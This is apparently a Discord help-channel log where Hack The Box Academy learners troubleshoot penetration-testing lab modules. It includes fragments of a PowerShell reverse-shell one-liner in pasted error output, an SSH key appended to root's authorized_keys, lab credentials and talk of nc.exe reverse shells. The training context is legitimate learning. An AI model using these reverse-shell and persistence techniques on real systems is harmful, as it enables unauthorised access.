I have a question about log poisoning . Adding (somehow ) a php payload to a log file e.g. /var/log/nginx/access.log and then we are able to request that file (through LFI) why the php code will be executed ? This file is not .php file so the web app shouldn’t read just a text ?

ocean night
fathom pendant
small echo
#

Hey on the module "Introduction to Windows Command Line" on "Command Pronpt Basics" , the awnser to the question is not working.
"In what directory can the cmd executable be found"
Ive awnserd "System32" "system32" and alwys gives wrong awnser.. am I missing something? Thank you 🙂

regal gust
#

Hey, does anyone know why this answer is incorrect? I'm assuming its some strange formatting I'm missing, as has been the case throughout this module.

fathom pendant
regal gust
#

Ah apologies. It's Networking Foundations, section 10, question 6 :)

fathom pendant
regal gust
#

Thanks :)

fathom pendant
#

Also section name not #

regal gust
#

Ah, network Security

fathom pendant
#

I cant be fucked to count the sections lol

regal gust
#

Apologies, new to academy haha, just thought I would give it a try for the certs

fathom pendant
#

a-b detection

regal gust
#

Assumed so, this module has been infuriating with formatting

#

Ah, thanks so much

#

Oh that also doesn't work

fathom pendant
#

Tbh I think that deserves an #1234357888114364508 because that makes it a compound word, so 2 word answer not 3

regal gust
fathom pendant
regal gust
#

Oh lmfao. i take things way too literally

fathom pendant
#

I was providing the format, not the answer

#

I rarely, if ever, will just give the answer

regal gust
#

Yup, just needed a hyphon in my previous answer

#

Will post that in #1234357888114364508 then, as previously in this module they set precident that hyphonated words are 1 word

#

Thanks for the help :)

fresh moth
#

Im facing some issues , while trying tools on my local machine it dosnt work but it works on the attack box given my HTB , the ip is active and im getting the services here there are no syntax issue (ive used the same command on the attacking machine too)

tawny flint
#

Hi, someone can help me with SQL Fundamentals, the new skills assessment? I passed the login portal, and I think where is the next injection field, but not even answer the first question.

ocean ember
#

Hello everyone,

I’m considering the Gold – Advanced Cyber Security plan

Will I get access to Tier 3 modules if I enroll?

modest token
#

In Abusing HTTP Misconfigurations Tools & Prevention we are told to "Use WCVS to identify an HTTP header vulnerable to web cache poisoning in the provided web application." I got really frustrated with this one. The only way I was eventually able to solve it was to install the exact same version of the tool used in the module: WCVS v1.1.0 and then I had to specify the cache header manually. I hope that this helps anyone else who is struggling with this in the future.

grizzled schooner
#

Hoping someone can give me some more clarification on this part of Linux Privilege Escalation | Docker - Is https://<parrot-os> supposed to be an IP or link of some sort? I'm just not really sure what to be putting here.

fathom pendant
#

ah ok it's referring to using your attackbox to download the file to the container

#

so <parrot-os> would be your system (it's using https:// and :443 here to imply you can use any port combo/etc)

#

directly above that codeblock

If not installed, then we can download it here and upload it to the Docker container.

grizzled schooner
#

So you'd just need whatever "VM" you want e.g. parrot/kali downloaded as a docker file on your attack box?

fathom pendant
#

no

#

this is specifically just transferring the docker binary to the target; as stated in the reading directly above that codeblock

#

i literally just read the context above that codeblock and that cleared up all the confusion you showed here. Always look for context surrounding something you're confused on

fathom pendant
glad flicker
#

on the skills assessment for shells & payloads, two of the "hints" provide some credentials. Are these credentials actually available through enumerating the boxes? or do you just have to look at the hints to find them?

spark flicker
#

I don't even know where to ask this, but doesn't referring friends give cubes?
I referred 2 friends who have both said that they have completed the intro modules, yet I got no cubes from it all.

fathom pendant
fathom pendant
#

you only get cubes for t2+ module completion; with the caveat that tier 2 completion doesn't count if the user has an active student sub

spark flicker
#

If it is only T2 modules, then alrighty. Thank you for the info

fathom pendant
#

up to

#

5, 10, 20 reward tier -> total 35

spark flicker
#

Ah, neat.
Would be nice if that was shown in the referral page itself, haha

fathom pendant
#

/feedback

fiery trench
#

Howdy 👋🏾

I'm looking for help with Intro to Android Application Static Analysis Skills Assessment

I manage decompile the APK, including the Hermes JavaScript bytecode. I've search for keywords that could lead to showing a POST request for the flag but I've come up with nothing. Additionally, I don't see any possible logic to patch in order to cause the APP to reveal the flag. I'm probably not looking in the right place but I think I've reach my limitation on where to search. If anyone can give a hand or point me to the right direction, it would greatly be appreciated.

Update: Made progress. I discovered an endpoint that I missed.

wide cove
#

options

ocean night
upper haven
leaden island
#

yo guys, im having a problem in web attacks -> XXE injection

leaden island
#

anybody i can DM ?

earnest pasture
fathom pendant
#

Try adding -Pn to the nmap scan

#

But in reality just run a ping sweep from the host to find other internal hosts

#

Also deleting the post bc the module is above tier 0, and you're posting spoiler info

grizzled schooner
#

Working on Linux Privilege Escalation | Logrotten I can't get logrotten to even run. Transferred the compiled exploit via scp --> didn't run. Tried grabbing with git clone and wget, on the target, also doesn't work. Am I missing something?

fathom pendant
#

Also dont try and get a privileged shell, instead try to copy/move files

median gale
#

Anyone done the android series got some setup problems i would like to ask a couple things about. I remember i had this working a couple of months ago when it was first released but going back to it know the emulator starts but it so slow you cant work with. Nuking it didnt help, rendering on h/w seems to take forever to connect.

mellow tangle
# fathom pendant Also deleting the post bc the module is above tier 0, and you're posting spoiler...

oh sorry, I did not think about it, won't happen again

Try adding -Pn to the nmap scan
it won't work because -Pn prevents ICMP packets. And I tried to do send them via nmap just like it is shown in the walkthrough.

But in reality just run a ping sweep from the host to find other internal hosts
yes I ping sweep from meterpreter worked

but still that nmap via proxychains doesn't work and in the walkthrough it is shown as a working example
Also rdp_scanner should not throw errors, most likely something is broken in the lab. I'm not trying to complain, I just spent time and efforts to make things right, so I'm just reporting it because I believe others may struggle as well. Maybe if rdp_scan doesn't work we can add a Note saying in the lab it doesn't work. The same for nmap?

At any case thank you

fathom pendant
#

Personally, I use ligolo for pivoting.

fathom pendant
#

The main thing is consistency

#

don't use one style for one thing then switch to another style for another

#

also technique-based can have a section that also provides the CWE value, meaning that you can supply both root cause/impact. Just be consistent with how you present and defend your finding

hidden ledge
#

Attacking Common Applications - First Skills Assessment: Is it normal that the vulnerable application is full of 404 pages?

tame basalt
#

problem is the exercise doesn't contain the auth for the server, soo hard to complete.
Found it on the next page.

fathom pendant
tame basalt
#

Says to use SSH 😛 buuuut it's RDP.

fathom pendant
#

is ssh not open?

tame basalt
#

Haven't actually checked, but module tells me to use powershell, is that possible through SSH?

#

I just used RDP and worked fine and I could complete 😛 So maybe i just found another way

fathom pendant
#

if ssh drops you into cmd; you just type powershell hit enter and boom... powershell

#

also ssh drops you into the shell/terminal environment, it isn't by itself a terminal environment just a communication pathway

tame basalt
#

I juse found RDP and thought why not kek

fathom pendant
#

in most cases RDP will be enabled on windows machines. however not always

tame basalt
#

Would be hella lot quicker also without UI 😛

#

Windows sluggish as always FeelsBadMan

#

Is there a way to force it into powershell or do I have to execute it after entering target?

fathom pendant
#

you can't force it

tame basalt
#

Gotcha so I'll just get it tattooed so I won't forget

fathom pendant
#

sometimes the environment set up for ssh is powershell, sometimes it's cmd. but it's effortless to swap between

tame basalt
#

Nice to know that little trick 😄

tidal jolt
#

Which channel is best for asking assistance with a VPN issue on Academy?

fathom pendant
compact patrolBOT
fathom pendant
#

but a 'vpn issue' is vague

tame basalt
digital shoal
#

I am on the Skill Assessment on the Windows Lateral Movement. I am Stuck on the fourth Question. I think i Need a sanity Check on my malicious Patch. Anyone available for an DM?

tidal jolt
sturdy sandal
#

Hi all, I am on the Skill Assessment on the Windows Lateral Movement too and stuck on the last question. Anyone can give me a nudge ? nvm, got it.

jovial walrus
#

i just wasted an hour on this

teal root
#

Can someone give me a nudge for Q4 of the MSSQL, Exchange, and SCCM Attacks -> Skills Assessment, I need to get access to the SCCM server but cant figure it out

fathom pendant
#

@runic lance please dont reveal answers/ways to get answers for modules above tier 0.

lofty turret
#

Hi All, have a problem with 1 question in DNS Zone Transfers, can't zone transfer on non of both ns for inlanefreight.htb. What may be wrong?

fathom pendant
teal root
#

Thanks, I realised i was being blind

#

I finally completed the CAPE pathway

jovial walrus
#

for network services on password attacks what is a reliable tool to crack winrm credentials ? i am running into errors with evil-winrm and netexec ...now using metasploit but its slow

dense lava
jovial walrus
dense lava
brave field
# jovial walrus

Please update and upgrade your Kali system. This error is likely due to outdated packages.

brave field
# jovial walrus

I don't think that hydra supports winrm brute forcing like that.

jovial walrus
#

i reinstalled ..its working now

#

these tools can be a pain at times

quasi wave
#

I'm doing the one question for Get-WinEvent section of Windows Event Logs and Finding Evil module. I am trying to filter the output to get the specific share. I am trying to use the commands talked about in the section but its not working.

Can someone help me out?

cloud urchin
left needle
#

I am unable to download the ssh key from smb share the download gets failed everytime this is in the module attacking common services section attacking smb I tried using smbclient, smbmap and even tried to mount the share but didn't work, even though got the flag from another service

quasi wave
#

I ran powershell

#

Will try again tomorrow

#

Some commands give too much output to sift through and others provide just straight errors

snow relic
#

Anyone done the windows lateral movement skills assessment? Need some help. Can you DM me ?

devout garden
#

Is there any way I can see the people I follow?

humble nymph
#

Hi all, do you know who I can message from HTB academy to resolve a module issue?

delicate hinge
fathom pendant
#

@last hedge please do not share answers even if you use 'spoiler' tags

fathom pendant
#

if it's an ACTUAL module issue; then -> #1234357888114364508 with the problem
If it's an issue with how you're performing the task, then just ask here. But there's more context needed

delicate hinge
#

(Moving question here) - Active Directory PowerView Module - (Potential bug?)
Hey all! I've got a question regarding PowerView and the environment of the mentioned Academy module.

-Module Question: "Find a member of the Administrators group in a different domain"
-My Assumption: Use PowerView to enumerate the admins group of the other domains using -Domain.

Pretty straightforward, and exactly what the module said to do in the guide. However, whenever I use the flag, it throws the attached error.

Now, I've already found the question answer (through a non intended route), but I was more curious about why a lookup in another domain failed if the Trust relationship is Bidirectional, especially because the Module made a point to say that Users from both Domains could query Users/Resources in the opposite domain. From what I understand, this error implies the opposite of that. Anyone have any insight?

Troubleshooting: I was told that this was a collision issue with the ActiveDirectory PowerShell module being loaded alongside PowerView, but I've verified that it is unloaded, while PowerView is loaded.

humble nymph
# fathom pendant it depends

Thanks - I suppose maybe it is module feedback more than anything? I love HTBacademy and have got a lot out of it. But the Web Service & API Attacks module really is not up to the high standard of the rest of the platform. The order of material makes no sense, it's very hard to follow, concepts are introduced in the challenges that are not covered in the content. Honestly I would like a refund of cubes if possible.

fathom pendant
#

also higher-tier modules tend to have concepts that require some baseline understanding to be able to work through with little trouble

#

i.e. a module focusing on NoSQLi will assume you know about SQLi

#

per the module overview page:
In addition to the above, a firm grasp of the following modules can be considered as prerequisites for the successful completion of this module:

  • Linux Fundamentals
  • Introduction to Python 3
  • Web Requests
  • Introduction to Web Applications
  • Using Web Proxies
  • File Inclusion / Directory Traversal
  • Attacking Web Applications with Ffuf
  • Cross-Site Scripting (XSS)
  • SQL Injection Fundamentals
  • SQLMap Essentials
  • File Upload Attacks
  • Command Injections
  • Server-side Attacks
  • Web Attacks
#

The module is classified as "Medium" and assumes a working knowledge of the Linux command line and an understanding of information security fundamentals. The module also assumes basic knowledge of web applications and web requests, and it will build on this understanding to teach how web service/API vulnerabilities can be exploited.

humble nymph
# fathom pendant refund is unlikely, but you'd have to reach out to support. as far as feedback, ...

fair enough - I'm not trying to be difficult, it just feels as an end user that compared to the normal quality of well-thought out modules, this felt like a poorly organised shopping list of information.

To give an example, the Command Injection module was brilliantly laid out, really easy to follow, easy to learn from. This one feels very different.

I'm not here saying it is not as advertised - I'm sure the bullet point list and disclaimer are accurate. My point is that the content is not clearly communicated and is a much lower quality. It's a shame the response is very defensive (i.e. the customer is shown the disclaimers) rather than engaging with the core feedback of low quality feedback. But I appreciate I did ask for a refund, and it's a business, so there is that

fathom pendant
#

like underlying concepts should be known, sure, but the explanation of the attack is lacking

#

i'm not staff btw; just trying to help better form your feedback (if that makes sense)

humble nymph
winter shell
#

Hello guys! i am at the Dynamic Port Forwarding with SSH and SOCKS Tunneling module and i am trying to use nmap with proxychains for the second question of the module. when i scan i get All 1000 scanned ports on 172.16.5.19 are in ignored states. any ideas why this happen ?

fathom pendant
#
  • sudo proxychains
  • nmap -sT
winter shell
#

i see! sudo worked! but why ?

mental canopy
fathom pendant
delicate hinge
#

Which is why I think this may be a bug

mental canopy
agile osprey
#

Documentation & Reporting module had no business being that good 🔥

delicate hinge
mental canopy
delicate hinge
#

That hurts so bad lmao

#

My question does still stand, but thank you for clarifying that for me. I do still think enumerating the other domain with powerview should work (since it did for the Guide), but that's good to realize that it wasn't necessary for the question alone.

fathom pendant
delicate hinge
#

yeah, I suppose maybe I saw it originally but my method still should have worked, consdiering it would have enumerated all Administrator users in the other domain's group

fathom pendant
#

also the reading doesn't always go 1::1 with what you can do

delicate hinge
#

Ahhh, I haven't run into that yet. I thought that if the guide did it explicitly in that environment, that you'd be able to do it in order to explore the tools

delicate hinge
# fathom pendant also the reading doesn't always go 1::1 with what you can do

Regarding this, this may just be my ignorance with how Trusts & PowerView works, but does this mean that the environment that you answer the questions in "fakes" being a Bidirectional Trust, somehow?

That's the only way I could imagine PowerView not being able to enumerate the opposing Domain Users via the Bidirectional Trust when the module Guide explicitly says it can (and demonstrates it).

fathom pendant
#

could just be a weird thing with powerview

#

¯_(ツ)_/¯

#

don't have enough exp to be able to really elaborate on it

fathom pendant
#

just to be clear

delicate hinge
fathom pendant
#

ah; the 'reading' isn't a 'guide' per-se

delicate hinge
#

Oh, what would the guide be in that case?

fathom pendant
#

the guide would be the writeups provided via the annual subscription

#

that explicitly tells you commands

delicate hinge
#

Ohhhhhhhhh I didn't even know those were a thing, that's why

#

Dang lol

fathom pendant
#

i generally recommend against using those tbh

delicate hinge
#

Yeah I kinda feel like exploring and finding your way is more fun

fathom pendant
#

because they don't explain anything, just provide commands and answers

#

so very little actual learning

#

(the learning is assumed from the reading)

#

and very few times do they give a reference to the reading in them

delicate hinge
#

Yeah, I like being able to explore around and come to the answer by re-reading the Readings and messing with different flags or methods of doing them

#

(which may have bitten me in the ass in the end but I'm still curious)

#

Huh, yeah though, I guess we just kinda chalk it up to a weird environment/PowerView thing then? I might leave my #1234357888114364508 post up in case someone knows the technical limitation being encountered.

urban forum
#

hello all, guys in the -Active Directory Enumeration & Attacks module

at Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows

at Accessing DC03 Using Enter-PSSession

the command was PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
from where we obtain the administrator password?

fathom pendant
urban forum
fathom pendant
#

this isn't the task presented to you

#

read the task again. You don't need to access DC03

urban forum
fathom pendant
#

not everything you see will be replicable, if the administrator password hasn't been provided then you won't be able to perform this action

#

(also maybe try first running powershell as admin)

urban forum
fathom pendant
#
  1. the module is above tier 0; please stop posting images from it
  2. the administrator password would explicitly be labled under the user 'administrator'
fathom pendant
fathom pendant
#

thanks ❤️ good luck

urban forum
fathom pendant
leaden island
#

yo guys, im on web attacks -> skill assesment
can anybody give me a tip
i feel im relying too much on help but im stuck anyways

hidden ledge
#

Where are you stuck ?

leaden island
#

but it dosent seem the one that will lead to file inclusion

#

and i cant find anything interesting after

hidden ledge
#

Don't spoil here you can come dm

karmic osprey
lofty cedar
#

Need help on "Pivoting, Tunneling, and Port Forwarding -> Meterpreter Tunneling & Port Forwarding"

I perform the ping sweep, but the IPS I get are not the right answer

hidden ledge
#

Which question is it?

#

You put the wrong subnet from what I see

#

You should put the internal subnet as RHOSTS.

lofty cedar
lofty cedar
lofty turret
jovial walrus
#

Attacking SAM, SYSTEM, and SECURITY on password attacks

#

is the username ||Unknown User|| or ||gupdate|| ?

cloud urchin
#

@jovial walrus Please take care not to post content from modules above tier 0.

jovial walrus
cloud urchin
#

You can just explain your issue without revealing content from the module. Your screenshot included the NT hash of various accounts. Spoiler tags don't do anything.

mental canopy
jovial walrus
#

its a service name

mental canopy
rain mirage
#

WINDOWS PRIVILEGE ESCALATION
Windows Server

the question : Obtain a shell on the target host, enumerate the system and escalate privileges. Submit the contents of the flag.txt file on the Administrator Desktop.

i tried running exploits locally and remotely via msfconsole , but i did hit errors after error , can someone help ?

long flint
halcyon fractal
#

Cross post here, as this may be the better channel:

hasty mauve
#

Module: NTLM Relay Attacks
Section: Advanced NTLM Relay Attacks Targeting Kerberos

htb-student@ubuntu:~$ cme smb 172.16.117.3 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe' --kerberos
SMB         172.16.117.3    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.117.3    445    DC01             [-] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe KDC_ERR_C_PRINCIPAL_UNKNOWN 
htb-student@ubuntu:~$ cme smb 172.16.117.3 -u 'plaintext$' -p 'o6@ekK5#rlw2rAe'
SMB         172.16.117.3    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.117.3    445    DC01             [+] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe

when I try to connect as plaintext$ using NTLM it works, but with Kerberos it says principal unknown, and kerberos authentication is required for the attack to work.

#

Tried to reset the environment, still the same.

#

When I tried to abuse RBCD it gave me the same error

sweet comet
#

Module: DACL Attacks ||
Part: Shadow Credentials
Question 2: Am I really supposed to be using gabriel creds? I see a path from jeffrey through martha but no other...

gray yacht
dense lava
hasty mauve
#

This issue was only with using the pre-created 'plaintext$' account, when I created my own it worked

#

Which is weird

dense lava
#

Oh, I think the intent is to use your own, I just turned off my computer so I can't see my notes

hasty mauve
#

Which is weird because if the account can authenticate using NTLM it should be able to authenticate through Kerberos

#

I used plaintext$ account with previous attacks without having to create my own and it worked

#

But for this one it required kerberos auth which failed for some reason

pallid temple
#

Hello everyone, can someone help me to solve this question?please😫

dusk holly
#

i don't think you can share solutions

woven zenith
#

its not a solution.. I just compile the pieces that I search in this channel..

dusk holly
woven zenith
#

oopss I edit. lols

gray yacht
#

At the top of this channel is a message that states do not spoil module content over Tier 0

woven zenith
#

¯_(ツ)_/¯

dusk holly
iron yarrow
#

i need help, sqli Fundamentals

What is the password hash for the user 'admin'?

i managed to log in.

gray yacht
dusk holly
safe star
fathom pendant
#

It saves the effort/time delay of asking a mod to delete something.

fathom pendant
waxen totem
fathom pendant
#

in general though the proper queries should have been provided to you by the module in some form

iron yarrow
fathom pendant
#

should probably google then 😉 you're given the name of the application

iron yarrow
#

hmm ok

long kelp
fathom pendant
#

@coarse pine while I get you're trying to be helpful, refrain from giving direct answers. That's why I suggested doing a bit of research on the app and vulns instead of straight up saying it

long kelp
hasty mauve
#

NTLM authentication works but Kerberos doesn't

sweet comet
coarse pine
kind lance
#

Subject: Help with Lateral Movement / Pass-the-Hash (Invoke-TheHash)

Context: I am pivoting from MS01 to DC01 using julio credentials. I need to read C:\julio\flag.txt.

The Problem:

Reverse Shell: I can execute a reverse shell using Invoke-WMIExec + nc.exe. I get a connection back (connect to [IP]...), but the shell is blind/unresponsive. Commands like type return no output.

SMB & WMI: I tried copying the flag to a readable share using WMIExec, but I keep getting errors like 0xC000003A (Path not found) when trying to write to C:\Users\julio\Desktop.

Question: Since the shell is blind and I can't write to the user's Desktop, what is the most reliable writable directory on the DC to copy the flag to, so I can download it via Invoke-SMBClient?

silk lagoon
silk lagoon
hidden ledge
#

It should work

latent ether
#

Does anyone knows if im doing something wrong with Wi-Fi Penetration Testing Tools and Techniques SA - i made it to the final question. I got everything set up in order to be able to connect to the Inlane-Corp - (Protected EAP (PEAP) authentication, MSCHAPv2 inner authentication, no CA certificate, and the credentials), however the connection cannot be completed, no error provided, just loading and then... nothing happens.

hidden ledge
#

In Linux Privesc module python library hijacking they tell us that once a module content is hijacked we can just run the script with sudo like this:

#

But how are we able to use sudo on the python3 binary ?

#

Seems like nothing tells us we are able to

heady sapphire
hidden ledge
#

They did not mention it in the module but in fact it is in /etc/sudoers on the lab. I was just confused mb

granite canopy
#

Anyone having troubles with the SCCM Site Takeover II in MSSQL, Exchange and SCCM attacks module? My won't set up the 443 port making the || /AdminService/wmi/SMS_Admin || endpoint reachable :/

charred mountain
#

Hi everyone. Does anyone know what username and password I should use to run the exercise in the "Kerberoasting Linux" section of the "Active Directory Enumeration and Attacks" module of CPTS? I haven't found any information about this in the content.

lavish notch
cloud urchin
#

@hidden ledge Please take care not to post content from modules above tier 0

harsh gorge
#

@cloud urchin how often do you watch this chat man

cloud urchin
#

i used to exclusively post here, like over 10k messages and none in any other channel

storm elk
heady sapphire
#

Why the official cpts preparation track has an insane machine (Ghost ) in it ?

#

Should we expect this kind of difficulty in the exam ?

acoustic owl
heady sapphire
acoustic owl
waxen totem
#

Its a really good test of methodology

echo agate
# echo agate I just tried this using pwnbox and it works just fine. My own parrot VM (via aca...

and now pwnbox is also throwing errors.

┌─[eu-academy-3]─[10.10.14.154]─[htb-ac-1469386@htb-wir3mzs8nm]─[~]
└──╼ [★]$ gobuster dir -u $TARGET/nibbleblog/ --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt

Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://10.129.47.9/nibbleblog/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s

Starting gobuster in directory enumeration mode

Error: error on running gobuster: unable to connect to http://10.129.47.9/nibbleblog/: Get "http://10.129.47.9/nibbleblog/": dial tcp 10.129.47.9:80: i/o timeout (Client.Timeout exceeded while awaiting headers)

Is there any way to fix thsi besides restarting the target which I have already tried?

acoustic owl
late rune
#

im trying to do the security analyst course but im stuck at this question

During recovery, IOCs are still observed intermittently. Should recovery proceed, or should the case be escalated back to the investigation phase? Answer format: Recovery/Investigation

Can someone give me some hints what the answer can be ?

tribal plinth
echo agate
# acoustic owl Did the target start correctly? Restart it and wait 5 minutes. After that, every...

Tried this too. Does not appear to help.

// WORKS
┌─[eu-academy-3]─[10.10.14.154]─[htb-ac-1469386@htb-vpd5hay7kj]─[~]
└──╼ [★]$ curl $TARGET/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
,,,,,,,,,

// THROWS ERRORS
┌─[eu-academy-3]─[10.10.14.154]─[htb-ac-1469386@htb-vpd5hay7kj]─[~]
└──╼ [★]$ gobuster dir -u $TARGET/nibbleblog --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt

Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://10.129.163.197/nibbleblog
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s

Starting gobuster in directory enumeration mode

Error: error on running gobuster: unable to connect to http://10.129.163.197/nibbleblog/: Get "http://10.129.163.197/nibbleblog/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

acoustic owl
#

What happens when you enter curl http://10.129.163.197/nibbleblog/ in the terminal?

echo agate
acoustic owl
#

Now it seems to be working. I deleted your post because it contains spoilers.

coarse pine
#

can someone help im API attacks module?

urban forum
#

hello there, I cant run pingcastle in AD Enumeration and attacks module - Additional AD Auditing Techniques, help 😄

lavish notch
gray yacht
lavish notch
# gray yacht It's covered in that section, like a walkthrough.

I know, and I tried but got the printerbug script issue , then tried on pwnbox and still not working, "[] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[
] Triggered RPC backconnect, this may or may not have worked
"

lavish notch
gray yacht
# lavish notch Ooo. Any help or hint?

Make sure you have the basics, i.e., hosts file updated, using the correct IP addresses, i.e., CA and DC are being used correctly. You might need to use sudo with ntlmrelayx or you may not, I've see that work sometimes. I think most folks do not use the IP addresses correctly.

lavish notch
gray yacht
late rune
#

Nobody who can help me with my question ??

gray yacht
# late rune Nobody who can help me with my question ??

I haven't worked through that module/section so I cannot provide any assistance. If you haven't already, you can keyword search this channel with the discord server search feature and see if anyone else asked a similar question. Someone might have already provided some information that might help you.

late rune
#

oke

#

then I have to look how to search through this channel

gray yacht
late rune
#

I do not have a clue

gray yacht
late rune
#

yep , till now no luck

gray yacht
coarse pine
#

hello

#

can someone help in API attacks module?

late rune
#

Some one who can help me to run openvpn when I open kex with kex win ??

magic ember
#

I'm trying to solve this module: "Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'." For several days I've been trying everything the module provides, but I can't.

I've already tried using the reverse shell in cron jobs.

I've also tried using vim id_rsa, and I even created a Python server to try running linpeas on the machine.

I've already tried the key thing, attempting to give it permission with "echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys" and still nothing.

I think I've already done all the indicated steps, or maybe I'm missing something.

late rune
#

@magic ember have you tried this : sudo su - ??

magic ember
#

I cannot use sudo on user2.

charred mountain
#

Hi everyone. Does anyone know what username and password I should use to run the exercise in the "Kerberoasting Linux" section of the "Active Directory Enumeration and Attacks" module of CPTS? I haven't found any information about this in the content. The samples of the content are using a specific user, but didn't mention the pwd.

gray yacht
late rune
#

@gray yacht the avatar is that you ??

magic ember
#

Thanks dude

late rune
#

YW

magic ember
#

I feel stupid

late rune
#

next time use google

magic ember
#

;))

late rune
#

There where I found your answer 🙂

unborn hatch
#

I'm doing the Skills Assessment for LLM Output Attacks for the AI Red Team Path. Without giving away too much, I've run into inconsistencies with enumerating the next steps of the process. I'm genuinely getting different responses back from the server for identical queries which are intended to generate error messages from the server. Makes it hard to proceed with the expected path that I was assuming. Can I DM anyone for a sanity check or has anyone come across this and have a recommendation of what to do (I'm happy to provide more info, just don't wanna spoil it)?

magic ember
late rune
#

So as my sport school says :

You never loose
Or you win or you learn

halcyon fractal
unborn hatch
fathom pendant
fathom pendant
thin flicker
fathom pendant
thin flicker
#

Whenever I try to run the command to configure the container I get errors

fathom pendant
#

you're not gonna get too many people here that will be of assistance since many people choose not to do it, since there's no questions or anything attached to it

cloud urchin
fathom pendant
ripe bobcat
#

sorry

coarse pine
#

GG

grizzled schooner
#

I just feel that the User Account Controls section is very ambiguous when it comes to UACME

They don't really explain where they found within that what was vulnerable. I can't find anything within this folder containing a list of information etc. Am I missing something? Please @ with responses

desert widget
#

hello guys!
i am stuck on the command injection module, bypassing blacklisted commands section, can anyone help with the payload?

#

how can i read the flag.txt file?

#

i checked the payloads from payloadallthethings too

cloud urchin
#

Use what's taught in the module. It teaches you how to check which character is being filtered. I didn't have to use any external resources for that whole module.

#

Go one by one until you find what's blacklisted then find another one that works.

desert widget
#

alright

#

thanks dude!

grand loom
#

I found a mistake in the module answer for CAPE where can i submit this?

cloud urchin
prisma dawn
#

Please I need help with windows reverse shell when I try to connect back to my machine it doesn't connect.i have disabled Windows security same error message @cloud urchin @grand loom @desert widget

prisma dawn
#

Shell & payloads

#

@grand loom shell & payloads

cloud urchin
prisma dawn
#

In my machine I'm listening with
NC - lnvp 443

fathom pendant
prisma dawn
fathom pendant
prisma dawn
#

I did that already

#

New-Object : Exception calling ".ctor" with "2" argument(s): "A connection attempt failed because the connected party did not properly respond after a period of time,
or established connection failed because connected host has failed to respond 10.10.14.70:443"
At line:1 char:11

  • $client = New-Object System.Net.Sockets.TCPClient('10.10.14.70',443); ...
  •       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
    • FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand

You cannot call a method on a null-valued expression.
At line:1 char:70

  • ... ts.TCPClient('10.10.14.70',443);$stream = $client.GetStream();[byte[] ...
  •                                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:1 char:138

  • ... 65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) ...
  •                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:1 char:485

  • ... .Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  •                                                       ~~~~~~~~~~~~~~~
    
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : InvokeMethodOnNull
#

Error message

fathom pendant
prisma dawn
#

I'm using openvpn

fathom pendant
#

that's irrelevant

late rune
late rune
#

also so all the tasks ?
How do I then know I do a good job ??

fathom pendant
#

All the tasks relate to the questions

#

😉

late rune
#

oke

#

so the last few

#

on not these steps:

Triage the alerts

TheHive is loaded with alerts related to the Insights Nexus breach. You are requested to triage them, starting with:

    Task 1: Create a new case in TheHive. Find all the alerts that are specific to the Insights Nexus breach scenario, and link the alerts in the case. This exercise introduces you to work in TheHive alerts and cases.
fathom pendant
#

Yes it relates to it

#

also those aren't steps; those are 'tasks'

#

Tasks being specific goals

ocean night
#

The assessments are meant to test the knowledge you have gained while working through the module and sections. They are meant to me part of the module as a whole. Unsure what you mean by self learning the course, as the modules through the course essentially drive you to do just that.. self learn.

Most modules and sections conclude with an interaction portion that allows you to test what you have learned against a practical exercise pertaining to the module / section.

late rune
#

oke,then I can better do all

#

but that will be tomorrow
it's late here

#

Time to sleep

ocean night
#

I'd highly recommend following the module content regardless of whether you've studied the subject elsewhere tbh

#

Always more to learn 🙂

#

Good luck!

late rune
#

Thanks

#

I hope tomorow the vpn link is more stable
I get a lot of connection timeout messages

ocean night
#

If you continue to have VPN issues, please do ask for support 🙂

compact patrolBOT
ocean night
late rune
#

I give it up for today
I try to add something to the comments

#

and see a message : cannot access property data: e,response is undefined

cloud urchin
#

Are you using the pwnbox at the same time you're using the VPN?

late rune
#

nope

ocean night
#

